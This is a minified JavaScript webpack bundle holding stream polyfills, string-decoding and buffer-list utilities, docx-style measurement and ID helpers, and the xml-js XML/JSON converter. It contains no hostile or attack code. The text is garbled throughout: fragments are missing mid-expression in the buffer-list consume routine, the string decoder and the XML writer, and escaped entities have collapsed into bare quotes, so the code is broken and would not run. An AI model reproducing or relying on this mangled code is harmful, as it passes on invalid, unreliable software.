y=E(1086),A=Symbol("lastResolve"),p=Symbol("lastReject"),D=Symbol("error"),w=Symbol("ended"),x=Symbol("lastPromise"),S=Symbol("handlePromise"),O=Symbol("stream");function B(le,ye){return{value:le,done:ye}}function K(le){var ye=le[A];if(null!==ye){var z=le[O].read();null!==z&&(le[x]=null,le[A]=null,le[p]=null,ye(B(z,!1)))}}function ee(le){b.nextTick(K,le)}var se=Object.getPrototypeOf(function(){}),ve=Object.setPrototypeOf((_(C={get stream(){return this[O]},next:function(){var le=this,ye=this[D];if(null!==ye)return Promise.reject(ye);if(this[w])return Promise.resolve(B(void 0,!0));if(this[O].destroyed)return new Promise(function(v,M){b.nextTick(function(){le[D]?M(le[D]):v(B(void 0,!0))})});var z,v,M,l=this[x];if(l)z=new Promise((v=l,M=this,function(P,G){v.then(function(){M[w]?P(B(void 0,!0)):M[S](P,G)},G)}));else{var f=this[O].read();if(null!==f)return Promise.resolve(B(f,!1));z=new Promise(this[S])}return this[x]=z,z}},Symbol.asyncIterator,function(){return this}),_(C,"return",function(){var le=this;return new Promise(function(ye,z){le[O].destroy(null,function(l){l?z(l):ye(B(void 0,!0))})})}),C),se);$.exports=function(le){var ye,z=Object.create(ve,(_(ye={},O,{value:le,writable:!0}),_(ye,A,{value:null,writable:!0}),_(ye,p,{value:null,writable:!0}),_(ye,D,{value:null,writable:!0}),_(ye,w,{value:le._readableState.endEmitted,writable:!0}),_(ye,S,{value:function(l,f){var v=z[O].read();v?(z[x]=null,z[A]=null,z[p]=null,l(B(v,!1))):(z[A]=l,z[p]=f)},writable:!0}),ye));return z[x]=null,y(le,function(l){if(l&&"ERR_STREAM_PREMATURE_CLOSE"!==l.code){var f=z[p];return null!==f&&(z[x]=null,z[A]=null,z[p]=null,f(l)),void(z[D]=l)}var v=z[A];null!==v&&(z[x]=null,z[A]=null,z[p]=null,v(B(void 0,!0))),z[w]=!0}),le.on("readable",ee.bind(null,z)),z}},9686:($,U,E)=>{"use strict";function C(D,w){var x=Object.keys(D);if(Object.getOwnPropertySymbols){var S=Object.getOwnPropertySymbols(D);w&&(S=S.filter(function(O){return Object.getOwnPropertyDescriptor(D,O).enumerable})),x.push.apply(x,S)}return x}function b(D,w,x){return w in D?Object.defineProperty(D,w,{value:x,enumerable:!0,configurable:!0,writable:!0}):D[w]=x,D}var y=E(8764).Buffer,A=E(5575).inspect,p=A&&A.custom||"inspect";$.exports=function(){function D(){(function(S,O){if(!(S instanceof O))throw new TypeError("Cannot call a class as a function")})(this,D),this.head=null,this.tail=null,this.length=0}var x;return x=[{key:"push",value:function(S){var O={data:S,next:null};this.length>0?this.tail.next=O:this.head=O,this.tail=O,++this.length}},{key:"unshift",value:function(S){var O={data:S,next:this.head};0===this.length&&(this.tail=O),this.head=O,++this.length}},{key:"shift",value:function(){if(0!==this.length){var S=this.head.data;return this.head=1===this.length?this.tail=null:this.head.next,--this.length,S}}},{key:"clear",value:function(){this.head=this.tail=null,this.length=0}},{key:"join",value:function(S){if(0===this.length)return"";for(var O=this.head,B=""+O.data;O=O.next;)B+=S+O.data;return B}},{key:"concat",value:function(S){if(0===this.length)return y.alloc(0);for(var ee=y.allocUnsafe(S>>>0),se=this.head,ve=0;se;)y.prototype.copy.call(se.data,ee,ve),ve+=se.data.length,se=se.next;return ee}},{key:"consume",value:function(S,O){var B;return See.length?ee.length:S;if(K+=se===ee.length?ee:ee.slice(0,S),0==(S-=se)){se===ee.length?(++B,this.head=O.next?O.next:this.tail=null):(this.head=O,O.data=ee.slice(se));break}++B}return this.length-=B,K}},{key:"_getBuffer",value:function(S){var O=y.allocUnsafe(S),B=this.head,K=1;for(B.data.copy(O),S-=B.data.length;B=B.next;){var ee=B.data,se=S>ee.length?ee.length:S;if(ee.copy(O,O.length-S,0,se),0==(S-=se)){se===ee.length?(++K,this.head=B.next?B.next:this.tail=null):(this.head=B,B.data=ee.slice(se));break}++K}return this.length-=K,O}},{key:p,value:function(S,O){return A(this,function(B){for(var K=1;K{"use strict";var C=E(4155);function b(A,p){y(A,p),_(A)}function _(A){A._writableState&&!A._writableState.emitClose||A._readableState&&!A._readableState.emitClose||A.emit("close")}function y(A,p){A.emit("error",p)}$.exports={destroy:function(A,p){var D=this;return this._readableState&&this._readableState.destroyed||this._writableState&&this._writableState.destroyed?(p?p(A):A&&(this._writableState?this._writableState.errorEmitted||(this._writableState.errorEmitted=!0,C.nextTick(y,this,A)):C.nextTick(y,this,A)),this):(this._readableState&&(this._readableState.destroyed=!0),this._writableState&&(this._writableState.destroyed=!0),this._destroy(A||null,function(S){!p&&S?D._writableState?D._writableState.errorEmitted?C.nextTick(_,D):(D._writableState.errorEmitted=!0,C.nextTick(b,D,S)):C.nextTick(b,D,S):p?(C.nextTick(_,D),p(S)):C.nextTick(_,D)}),this)},undestroy:function(){this._readableState&&(this._readableState.destroyed=!1,this._readableState.reading=!1,this._readableState.ended=!1,this._readableState.endEmitted=!1),this._writableState&&(this._writableState.destroyed=!1,this._writableState.ended=!1,this._writableState.ending=!1,this._writableState.finalCalled=!1,this._writableState.prefinished=!1,this._writableState.finished=!1,this._writableState.errorEmitted=!1)},errorOrDestroy:function(A,p){var D=A._readableState,w=A._writableState;D&&D.autoDestroy||w&&w.autoDestroy?A.destroy(p):A.emit("error",p)}}},1086:($,U,E)=>{"use strict";var C=E(8106).q.ERR_STREAM_PREMATURE_CLOSE;function b(){}$.exports=function _(y,A,p){if("function"==typeof A)return _(y,null,A);var le,ye;A||(A={}),le=p||b,ye=!1,p=function(){if(!ye){ye=!0;for(var z=arguments.length,l=new Array(z),f=0;f{$.exports=function(){throw new Error("Readable.from is not available in the browser")}},6472:($,U,E)=>{"use strict";var C,b=E(8106).q,_=b.ERR_MISSING_ARGS,y=b.ERR_STREAM_DESTROYED;function A(S){if(S)throw S}function p(S,O,B,K){var ve,le;ve=K,le=!1,K=function(){le||(le=!0,ve.apply(void 0,arguments))};var ee=!1;S.on("close",function(){ee=!0}),void 0===C&&(C=E(1086)),C(S,{readable:O,writable:B},function(ve){if(ve)return K(ve);ee=!0,K()});var se=!1;return function(ve){if(!ee&&!se)return se=!0,function(le){return le.setHeader&&"function"==typeof le.abort}(S)?S.abort():"function"==typeof S.destroy?S.destroy():void K(ve||new y("pipe"))}}function D(S){S()}function w(S,O){return S.pipe(O)}function x(S){return S.length?"function"!=typeof S[S.length-1]?A:S.pop():A}$.exports=function(){for(var S=arguments.length,O=new Array(S),B=0;B0,function(z){K||(K=z),z&&se.forEach(D),ye||(se.forEach(D),ee(K))})});return O.reduce(w)}},94:($,U,E)=>{"use strict";var C=E(8106).q.ERR_INVALID_OPT_VALUE;$.exports={getHighWaterMark:function(b,_,y,A){var D,p=null!=(D=_).highWaterMark?D.highWaterMark:A?D[y]:null;if(null!=p){if(!isFinite(p)||Math.floor(p)!==p||p<0)throw new C(A?y:"highWaterMark",p);return Math.floor(p)}return b.objectMode?16:16384}}},3194:($,U,E)=>{$.exports=E(7187).EventEmitter},2553:($,U,E)=>{"use strict";var C=E(9509).Buffer,b=C.isEncoding||function(B){switch((B=""+B)&&B.toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":case"raw":return!0;default:return!1}};function _(B){var K;switch(this.encoding=function(ee){var se=function(ve){if(!ve)return"utf8";for(var le;;)switch(ve){case"utf8":case"utf-8":return"utf8";case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return"utf16le";case"latin1":case"binary":return"latin1";case"base64":case"ascii":case"hex":return ve;default:if(le)return;ve=(""+ve).toLowerCase(),le=!0}}(ee);if("string"!=typeof se&&(C.isEncoding===b||!b(ee)))throw new Error("Unknown encoding: "+ee);return se||ee}(B),this.encoding){case"utf16le":this.text=p,this.end=D,K=4;break;case"utf8":this.fillLast=A,K=4;break;case"base64":this.text=w,this.end=x,K=3;break;default:return this.write=S,void(this.end=O)}this.lastNeed=0,this.lastTotal=0,this.lastChar=C.allocUnsafe(K)}function y(B){return B<=127?0:B>>5==6?2:B>>4==14?3:B>>3==30?4:B>>6==2?-1:-2}function A(B){var K=this.lastTotal-this.lastNeed,ee=function(se,ve,le){if(128!=(192&ve[0]))return se.lastNeed=0,"\ufffd";if(se.lastNeed>1&&ve.length>1){if(128!=(192&ve[1]))return se.lastNeed=1,"\ufffd";if(se.lastNeed>2&&ve.length>2&&128!=(192&ve[2]))return se.lastNeed=2,"\ufffd"}}(this,B);return void 0!==ee?ee:this.lastNeed<=B.length?(B.copy(this.lastChar,K,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal)):(B.copy(this.lastChar,K,0,B.length),void(this.lastNeed-=B.length))}function p(B,K){if((B.length-K)%2==0){var ee=B.toString("utf16le",K);if(ee){var se=ee.charCodeAt(ee.length-1);if(se>=55296&&se<=56319)return this.lastNeed=2,this.lastTotal=4,this.lastChar[0]=B[B.length-2],this.lastChar[1]=B[B.length-1],ee.slice(0,-1)}return ee}return this.lastNeed=1,this.lastTotal=2,this.lastChar[0]=B[B.length-1],B.toString("utf16le",K,B.length-1)}function D(B){var K=B&&B.length?this.write(B):"";return this.lastNeed?K+this.lastChar.toString("utf16le",0,this.lastTotal-this.lastNeed):K}function w(B,K){var ee=(B.length-K)%3;return 0===ee?B.toString("base64",K):(this.lastNeed=3-ee,this.lastTotal=3,1===ee?this.lastChar[0]=B[B.length-1]:(this.lastChar[0]=B[B.length-2],this.lastChar[1]=B[B.length-1]),B.toString("base64",K,B.length-ee))}function x(B){var K=B&&B.length?this.write(B):"";return this.lastNeed?K+this.lastChar.toString("base64",0,3-this.lastNeed):K}function S(B){return B.toString(this.encoding)}function O(B){return B&&B.length?this.write(B):""}U.s=_,_.prototype.write=function(B){if(0===B.length)return"";var K,ee;if(this.lastNeed){if(void 0===(K=this.fillLast(B)))return"";ee=this.lastNeed,this.lastNeed=0}else ee=0;return ee=0?(l>0&&(ve.lastNeed=l-1),l):--z=0?(l>0&&(ve.lastNeed=l-2),l):--z=0?(l>0&&(2===l?l=0:ve.lastNeed=l-3),l):0}(this,B,K);if(!this.lastNeed)return B.toString("utf8",K);this.lastTotal=ee;var se=B.length-(ee-this.lastNeed);return B.copy(this.lastChar,0,se),B.toString("utf8",K,se)},_.prototype.fillLast=function(B){if(this.lastNeed<=B.length)return B.copy(this.lastChar,this.lastTotal-this.lastNeed,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal);B.copy(this.lastChar,this.lastTotal-this.lastNeed,0,B.length),this.lastNeed-=B.length}},5457:($,U,E)=>{"use strict";E.d(U,{vw:()=>_,rq:()=>b,EL:()=>A,NY:()=>y});let C=0;const b=p=>Math.floor(p/25.4*72*20),_=p=>Math.floor(72*p*20),y=()=>++C,A=()=>((p=21)=>{let D="",w=p;for(;w--;)D+="useandom-26T198340PX75pxJACKVERYMINDBUSHWOLF_GQZbfghjklqvwyzrict"[64*Math.random()|0];return D})().toLowerCase()},5575:($,U,E)=>{"use strict";E.r(U),E.d(U,{convertInchesToTwip:()=>C.vw,convertMillimetersToTwip:()=>C.rq,dateTimeValue:()=>b.sF,decimalNumber:()=>b.vH,eighthPointMeasureValue:()=>b.LV,hexColorValue:()=>b.dg,hpsMeasureValue:()=>b.KR,longHexNumber:()=>b.mA,measurementOrPercentValue:()=>b.aB,percentageValue:()=>b.wp,pointMeasureValue:()=>b.gg,positiveUniversalMeasureValue:()=>b._p,shortHexNumber:()=>b.G0,signedHpsMeasureValue:()=>b.Rg,signedTwipsMeasureValue:()=>b.xb,twipsMeasureValue:()=>b.Jd,uCharHexNumber:()=>b.xD,uniqueId:()=>C.EL,uniqueNumericId:()=>C.NY,universalMeasureValue:()=>b.KC,unsignedDecimalNumber:()=>b.f$});var C=E(5457),b=E(6595)},6595:($,U,E)=>{"use strict";E.d(U,{G0:()=>A,Jd:()=>ee,KC:()=>D,KR:()=>B,LV:()=>le,Rg:()=>K,_p:()=>x,aB:()=>ve,dg:()=>S,f$:()=>b,gg:()=>ye,mA:()=>y,sF:()=>z,vH:()=>C,wp:()=>se,xD:()=>p,xb:()=>O});const C=l=>{if(isNaN(l))throw new Error(`Invalid value '${l}' specified. Must be an integer.`);return Math.floor(l)},b=l=>{const f=C(l);if(f<0)throw new Error(`Invalid value '${l}' specified. Must be a positive integer.`);return f},_=(l,f)=>{const v=2*f;if(l.length!==v||isNaN(Number(`0x${l}`)))throw new Error(`Invalid hex value '${l}'. Expected ${v} digit hex value`);return l},y=l=>_(l,4),A=l=>_(l,2),p=l=>_(l,1),D=l=>{const f=l.slice(-2);if(!w.includes(f))throw new Error(`Invalid unit '${f}' specified. Valid units are ${w.join(", ")}`);const v=l.substring(0,l.length-2);if(isNaN(Number(v)))throw new Error(`Invalid value '${v}' specified. Expected a valid number.`);return`${Number(v)}${f}`},w=["mm","cm","in","pt","pc","pi"],x=l=>{const f=D(l);if(parseFloat(f)<0)throw new Error(`Invalid value '${f}' specified. Expected a positive number.`);return f},S=l=>{if("auto"===l)return l;const f="#"===l.charAt(0)?l.substring(1):l;return _(f,3)},O=l=>"string"==typeof l?D(l):C(l),B=l=>"string"==typeof l?x(l):b(l),K=l=>"string"==typeof l?D(l):C(l),ee=l=>"string"==typeof l?x(l):b(l),se=l=>{if("%"!==l.slice(-1))throw new Error(`Invalid value '${l}'. Expected percentage value (eg '55%')`);const f=l.substring(0,l.length-1);if(isNaN(Number(f)))throw new Error(`Invalid value '${f}' specified. Expected a valid number.`);return`${Number(f)}%`},ve=l=>"number"==typeof l?C(l):"%"===l.slice(-1)?se(l):D(l),le=b,ye=b,z=l=>l.toISOString()},4927:($,U,E)=>{function C(b){try{if(!E.g.localStorage)return!1}catch(y){return!1}var _=E.g.localStorage[b];return null!=_&&"true"===String(_).toLowerCase()}$.exports=function(b,_){if(C("noDeprecation"))return b;var y=!1;return function(){if(!y){if(C("throwDeprecation"))throw new Error(_);C("traceDeprecation")?console.trace(_):console.warn(_),y=!0}return b.apply(this,arguments)}}},9881:$=>{$.exports={isArray:function(U){return Array.isArray?Array.isArray(U):"[object Array]"===Object.prototype.toString.call(U)}}},7888:($,U,E)=>{var C=E(1229),b=E(1388),_=E(6501),y=E(4673);$.exports={xml2js:C,xml2json:b,js2xml:_,json2xml:y}},6501:($,U,E)=>{var C,b,_=E(4740),y=E(9881).isArray;function A(le,ye,z){return(!z&&le.spaces?"\n":"")+Array(ye+1).join(le.spaces)}function p(le,ye,z){if(ye.ignoreAttributes)return"";"attributesFn"in ye&&(le=ye.attributesFn(le,b,C));var l,f,v,M,P=[];for(l in le)le.hasOwnProperty(l)&&null!=le[l]&&(M=ye.noQuotesForNativeAttributes&&"string"!=typeof le[l]?"":'"',f=(f=""+le[l]).replace(/"/g,"""),v="attributeNameFn"in ye?ye.attributeNameFn(l,f,b,C):l,P.push(ye.spaces&&ye.indentAttributes?A(ye,z+1,!1):" "),P.push(v+"="+M+("attributeValueFn"in ye?ye.attributeValueFn(f,l,b,C):f)+M));return le&&Object.keys(le).length&&ye.spaces&&ye.indentAttributes&&P.push(A(ye,z,!1)),P.join("")}function D(le,ye,z){return C=le,b="xml",ye.ignoreDeclaration?"":""}function w(le,ye,z){if(ye.ignoreInstruction)return"";var l;for(l in le)if(le.hasOwnProperty(l))break;var f="instructionNameFn"in ye?ye.instructionNameFn(l,le[l],b,C):l;if("object"==typeof le[l])return C=le,b=f,"";var v=le[l]?le[l]:"";return"instructionFn"in ye&&(v=ye.instructionFn(v,l,b,C)),""}function x(le,ye){return ye.ignoreComment?"":"\x3c!--"+("commentFn"in ye?ye.commentFn(le,b,C):le)+"--\x3e"}function S(le,ye){return ye.ignoreCdata?"":"","]]]]>"))+"]]>"}function O(le,ye){return ye.ignoreDoctype?"":""}function B(le,ye){return ye.ignoreText?"":(le=(le=(le=""+le).replace(/&/g,"&")).replace(/&/g,"&").replace(//g,">"),"textFn"in ye?ye.textFn(le,b,C):le)}function K(le,ye,z,l){return le.reduce(function(f,v){var M=A(ye,z,l&&!f);switch(v.type){case"element":return f+M+function(G,X,L){C=G,b=G.name;var h=[],R="elementNameFn"in X?X.elementNameFn(G.name,G):G.name;h.push("<"+R),G[X.attributesKey]&&h.push(p(G[X.attributesKey],X,L));var J=G[X.elementsKey]&&G[X.elementsKey].length||G[X.attributesKey]&&"preserve"===G[X.attributesKey]["xml:space"];return J||(J="fullTagEmptyElementFn"in X?X.fullTagEmptyElementFn(G.name,G):X.fullTagEmptyElement),J?(h.push(">"),G[X.elementsKey]&&G[X.elementsKey].length&&(h.push(K(G[X.elementsKey],X,L+1)),C=G,b=G.name),h.push(X.spaces&&function(Z,ue){var Ie;if(Z.elements&&Z.elements.length)for(Ie=0;Ie")):h.push("/>"),h.join("")}(v,ye,z);case"comment":return f+M+x(v[ye.commentKey],ye);case"doctype":return f+M+O(v[ye.doctypeKey],ye);case"cdata":return f+(ye.indentCdata?M:"")+S(v[ye.cdataKey],ye);case"text":return f+(ye.indentText?M:"")+B(v[ye.textKey],ye);case"instruction":var P={};return P[v[ye.nameKey]]=v[ye.attributesKey]?v:v[ye.instructionKey],f+(ye.indentInstruction?M:"")+w(P,ye,z)}},"")}function ee(le,ye,z){var l;for(l in le)if(le.hasOwnProperty(l))switch(l){case ye.parentKey:case ye.attributesKey:break;case ye.textKey:if(ye.indentText||z)return!0;break;case ye.cdataKey:if(ye.indentCdata||z)return!0;break;case ye.instructionKey:if(ye.indentInstruction||z)return!0;break;default:return!0}return!1}function se(le,ye,z,l,f){C=le,b=ye;var v="elementNameFn"in z?z.elementNameFn(ye,le):ye;if(null==le||""===le)return"fullTagEmptyElementFn"in z&&z.fullTagEmptyElementFn(ye,le)||z.fullTagEmptyElement?"<"+v+">":"<"+v+"/>";var M=[];if(ye){if(M.push("<"+v),"object"!=typeof le)return M.push(">"+B(le,z)+""),M.join("");le[z.attributesKey]&&M.push(p(le[z.attributesKey],z,l));var P=ee(le,z,!0)||le[z.attributesKey]&&"preserve"===le[z.attributesKey]["xml:space"];if(P||(P="fullTagEmptyElementFn"in z?z.fullTagEmptyElementFn(ye,le):z.fullTagEmptyElement),!P)return M.push("/>"),M.join("");M.push(">")}return M.push(ve(le,z,l+1,!1)),C=le,b=ye,ye&&M.push((f?A(z,l,!1):"")+""),M.join("")}function ve(le,ye,z,l){var f,v,M,P=[];for(v in le)if(le.hasOwnProperty(v))for(M=y(le[v])?le[v]:[le[v]],f=0;f{var C=E(6501);$.exports=function(b,_){b instanceof ie&&(b=b.toString());var y=null;if("string"==typeof b)try{y=JSON.parse(b)}catch(A){throw new Error("The JSON structure is invalid")}else y=b;return C(y,_)}},4740:($,U,E)=>{var C=E(9881).isArray;$.exports={copyOptions:function(b){var _,y={};for(_ in b)b.hasOwnProperty(_)&&(y[_]=b[_]);return y},ensureFlagExists:function(b,_){b in _&&"boolean"==typeof _[b]||(_[b]=!1)},ensureSpacesExists:function(b){(!("spaces"in b)||"number"!=typeof b.spaces&&"string"!=typeof b.spaces)&&(b.spaces=0)},ensureAlwaysArrayExists:function(b){"alwaysArray"in b&&("boolean"==typeof b.alwaysArray||C(b.alwaysArray))||(b.alwaysArray=!1)},ensureKeyExists:function(b,_){b+"Key"in _&&"string"==typeof _[b+"Key"]||(_[b+"Key"]=_.compact?"_"+b:b)},checkFnExists:function(b,_){return b+"Fn"in _}}},1229:($,U,E)=>{var C,b,_=E(6099),y=E(4740),A=E(9881).isArray;function p(le){var ye=Number(le);if(!isNaN(ye))return ye;var z=le.toLowerCase();return"true"===z||"false"!==z&&le}function D(le,ye){var z;if(C.compact){if(!b[C[le+"Key"]]&&(A(C.alwaysArray)?-1!==C.alwaysArray.indexOf(C[le+"Key"]):C.alwaysArray)&&(b[C[le+"Key"]]=[]),b[C[le+"Key"]]&&!A(b[C[le+"Key"]])&&(b[C[le+"Key"]]=[b[C[le+"Key"]]]),le+"Fn"in C&&"string"==typeof ye&&(ye=C[le+"Fn"](ye,b)),"instruction"===le&&("instructionFn"in C||"instructionNameFn"in C))for(z in ye)if(ye.hasOwnProperty(z))if("instructionFn"in C)ye[z]=C.instructionFn(ye[z],z,b);else{var l=ye[z];delete ye[z],ye[C.instructionNameFn(z,l,b)]=l}A(b[C[le+"Key"]])?b[C[le+"Key"]].push(ye):b[C[le+"Key"]]=ye}else{b[C.elementsKey]||(b[C.elementsKey]=[]);var f={};if(f[C.typeKey]=le,"instruction"===le){for(z in ye)if(ye.hasOwnProperty(z))break;f[C.nameKey]="instructionNameFn"in C?C.instructionNameFn(z,ye,b):z,C.instructionHasAttributes?(f[C.attributesKey]=ye[z][C.attributesKey],"instructionFn"in C&&(f[C.attributesKey]=C.instructionFn(f[C.attributesKey],z,b))):("instructionFn"in C&&(ye[z]=C.instructionFn(ye[z],z,b)),f[C.instructionKey]=ye[z])}else le+"Fn"in C&&(ye=C[le+"Fn"](ye,b)),f[C[le+"Key"]]=ye;C.addParent&&(f[C.parentKey]=b),b[C.elementsKey].push(f)}}function w(le){var ye;if("attributesFn"in C&&le&&(le=C.attributesFn(le,b)),(C.trim||"attributeValueFn"in C||"attributeNameFn"in C||C.nativeTypeAttributes)&&le)for(ye in le)if(le.hasOwnProperty(ye)&&(C.trim&&(le[ye]=le[ye].trim()),C.nativeTypeAttributes&&(le[ye]=p(le[ye])),"attributeValueFn"in C&&(le[ye]=C.attributeValueFn(le[ye],ye,b)),"attributeNameFn"in C)){var z=le[ye];delete le[ye],le[C.attributeNameFn(ye,le[ye],b)]=z}return le}function x(le){var ye={};if(le.body&&("xml"===le.name.toLowerCase()||C.instructionHasAttributes)){for(var z,l=/([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\w+))\s*/g;null!==(z=l.exec(le.body));)ye[z[1]]=z[2]||z[3]||z[4];ye=w(ye)}if("xml"===le.name.toLowerCase()){if(C.ignoreDeclaration)return;b[C.declarationKey]={},Object.keys(ye).length&&(b[C.declarationKey][C.attributesKey]=ye),C.addParent&&(b[C.declarationKey][C.parentKey]=b)}else{if(C.ignoreInstruction)return;C.trim&&(le.body=le.body.trim());var f={};C.instructionHasAttributes&&Object.keys(ye).length?(f[le.name]={},f[le.name][C.attributesKey]=ye):f[le.name]=le.body,D("instruction",f)}}function S(le,ye){var z;if("object"==typeof le&&(ye=le.attributes,le=le.name),ye=w(ye),"elementNameFn"in C&&(le=C.elementNameFn(le,b)),C.compact){var l;if(z={},!C.ignoreAttributes&&ye&&Object.keys(ye).length)for(l in z[C.attributesKey]={},ye)ye.hasOwnProperty(l)&&(z[C.attributesKey][l]=ye[l]);!(le in b)&&(A(C.alwaysArray)?-1!==C.alwaysArray.indexOf(le):C.alwaysArray)&&(b[le]=[]),b[le]&&!A(b[le])&&(b[le]=[b[le]]),A(b[le])?b[le].push(z):b[le]=z}else b[C.elementsKey]||(b[C.elementsKey]=[]),(z={})[C.typeKey]="element",z[C.nameKey]=le,!C.ignoreAttributes&&ye&&Object.keys(ye).length&&(z[C.attributesKey]=ye),C.alwaysChildren&&(z[C.elementsKey]=[]),b[C.elementsKey].push(z);z[C.parentKey]=b,b=z}function O(le){C.ignoreText||(le.trim()||C.captureSpacesBetweenElements)&&(C.trim&&(le=le.trim()),C.nativeType&&(le=p(le)),C.sanitize&&(le=le.replace(/&/g,"&").replace(//g,">")),D("text",le))}function B(le){C.ignoreComment||(C.trim&&(le=le.trim()),D("comment",le))}function K(le){var ye=b[C.parentKey];C.addParent||delete b[C.parentKey],b=ye}function ee(le){C.ignoreCdata||(C.trim&&(le=le.trim()),D("cdata",le))}function se(le){C.ignoreDoctype||(le=le.replace(/^ /,""),C.trim&&(le=le.trim()),D("doctype",le))}function ve(le){le.note=le}$.exports=function(le,ye){var z=_.parser(!0,{}),l={};if(b=l,C=y.copyOptions(ye),y.ensureFlagExists("ignoreDeclaration",C),y.ensureFlagExists("ignoreInstruction",C),y.ensureFlagExists("ignoreAttributes",C),y.ensureFlagExists("ignoreText",C),y.ensureFlagExists("ignoreComment",C),y.ensureFlagExists("ignoreCdata",C),y.ensureFlagExists("ignoreDoctype",C),y.ensureFlagExists("compact",C),y.ensureFlagExists("alwaysChildren",C),y.ensureFlagExists("addParent",C),y.ensureFlagExists("trim",C),y.ensureFlagExists("nativeType",C),y.ensureFlagExists("nativeTypeAttributes",C),y.ensureFlagExists("sanitize",C),y.ensureFlagExists("instructionHasAttributes",C),y.ensureFlagExists("captureSpacesBetweenElements",C),y.ensureAlwaysArrayExists(C),y.ensureKeyExists("declaration",C),y.ensureKeyExists("instruction",C),y.ensureKeyExists("attributes",C),y.ensureKeyExists("text",C),y.ensureKeyExists("comment",C),y.ensureKeyExists("cdata",C),y.ensureKeyExists("doctype",C),y.ensureKeyExists("type",C),y.ensureKeyExists("name",C),y.ensureKeyExists("elements",C),y.ensureKeyExists("parent",C),y.checkFnExists("doctype",C),y.checkFnExists("instruction",C),y.checkFnExists("cdata",C),y.checkFnExists("comment",C),y.checkFnExists("text",C),y.checkFnExists("instructionName",C),y.checkFnExists("elementName",C),y.checkFnExists("attributeName",C),y.checkFnExists("attributeValue",C),y.checkFnExists("attributes",C),z.opt={strictEntities:!0},z.onopentag=S,z.ontext=O,z.oncomment=B,z.onclosetag=K,z.onerror=ve,z.oncdata=ee,z.ondoctype=se,z.onprocessinginstruction=x,z.write(le).close(),l[C.elementsKey]){var f=l[C.elementsKey];delete l[C.elementsKey],l[C.elementsKey]=f,delete l.text}return l}},1388:($,U,E)=>{var C=E(4740),b=E(1229);$.exports=function(_,y){var A,p,D,x;return x=C.copyOptions(y),C.ensureSpacesExists(x),p=b(_,A=x),D="compact"in A&&A.compact?"_parent":"parent",("addParent"in A&&A.addParent?JSON.stringify(p,function(w,x){return w===D?"_":x},A.spaces):JSON.stringify(p,null,A.spaces)).replace(/\u2028/g,"\\u2028").replace(/\u2029/g,"\\u2029")}},255:$=>{var U={"&":"&",'"':""","'":"'","<":"<",">":">"};$.exports=function(E){return E&&E.replace?E.replace(/([&"<>'])/g,function(C,b){return U[b]}):E}},3479:($,U,E)=>{var C=E(4155),b=E(255),_=E(2830).Stream;function y(p,D,w){w=w||0;var x,S,O=(x=D,new Array(w||0).join(x||"")),B=p;if("object"==typeof p&&(B=p[S=Object.keys(p)[0]])&&B._elem)return B._elem.name=S,B._elem.icount=w,B._elem.indent=D,B._elem.indents=O,B._elem.interrupt=B,B._elem;var K,ee=[],se=[];function ve(le){Object.keys(le).forEach(function(ye){ee.push(ye+'="'+b(le[ye])+'"')})}switch(typeof B){case"object":if(null===B)break;B._attr&&ve(B._attr),B._cdata&&se.push(("/g,"]]]]>")+"]]>"),B.forEach&&(K=!1,se.push(""),B.forEach(function(le){"object"==typeof le?"_attr"==Object.keys(le)[0]?ve(le._attr):se.push(y(le,D,w+1)):(se.pop(),K=!0,se.push(b(le)))}),K||se.push(""));break;default:se.push(b(B))}return{name:S,interrupt:!1,attributes:ee,content:se,icount:w,indents:O,indent:D}}function A(p,D,w){if("object"!=typeof D)return p(!1,D);var x=D.interrupt?1:D.content.length;function S(){for(;D.content.length;){var B=D.content.shift();if(void 0!==B){if(O(B))return;A(p,B)}}p(!1,(x>1?D.indents:"")+(D.name?"":"")+(D.indent&&!w?"\n":"")),w&&w()}function O(B){return!!B.interrupt&&(B.interrupt.append=p,B.interrupt.end=S,B.interrupt=!1,p(!0),!0)}if(p(!1,D.indents+(D.name?"<"+D.name:"")+(D.attributes.length?" "+D.attributes.join(" "):"")+(x?D.name?">":"":D.name?"/>":"")+(D.indent&&x>1?"\n":"")),!x)return p(!1,D.indent?"\n":"");O(D)||S()}$.exports=function(p,D){"object"!=typeof D&&(D={indent:D});var w,x,S=D.stream?new _:null,O="",B=!1,K=D.indent?!0===D.indent?" ":D.indent:"",ee=!0;function se(z){ee?C.nextTick(z):z()}function ve(z,l){if(void 0!==l&&(O+=l),z&&!B&&(S=S||new _,B=!0),z&&B){var f=O;se(function(){S.emit("data",f)}),O=""}}function le(z,l){A(ve,y(z,K,K?1:0),l)}function ye(){if(S){var z=O;se(function(){S.emit("data",z),S.emit("end"),S.readable=!1,S.emit("close")})}}return se(function(){ee=!1}),D.declaration&&(x={version:"1.0",encoding:(w=D.declaration).encoding||"UTF-8"},w.standalone&&(x.standalone=w.standalone),le({"?xml":{_attr:x}}),O=O.replace("/>","?>")),p&&p.forEach?p.forEach(function(z,l){var f;l+1===p.length&&(f=ye),le(z,f)}):le(p,ye),S?(S.readable=!0,S):O},$.exports.element=$.exports.Element=function(){var p=Array.prototype.slice.call(arguments),D={_elem:y(p),push:function(w){if(!this.append)throw new Error("not assigned to a parent!");var x=this,S=this._elem.indent;A(this.append,y(w,S,this._elem.icount+(S?1:0)),function(){x.append(!0)})},close:function(w){void 0!==w&&this.push(w),this.end&&this.end()}};return D}}},Q={};function ae($){var U=Q[$];if(void 0!==U)return U.exports;var E=Q[$]={exports:{}};return j[$].call(E.exports,E,E.exports,ae),E.exports}ae.d=($,U)=>{for(var E in U)ae.o(U,E)&&!ae.o($,E)&&Object.defineProperty($,E,{enumerable:!0,get:U[E]})},ae.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch($){if("object"==typeof window)return window}}(),ae.o=($,U)=>Object.prototype.hasOwnProperty.call($,U),ae.r=$=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty($,Symbol.toStringTag,{value:"Module"}),Object.defineProperty($,"__esModule",{value:!0})};var I={};return(()=>{"use 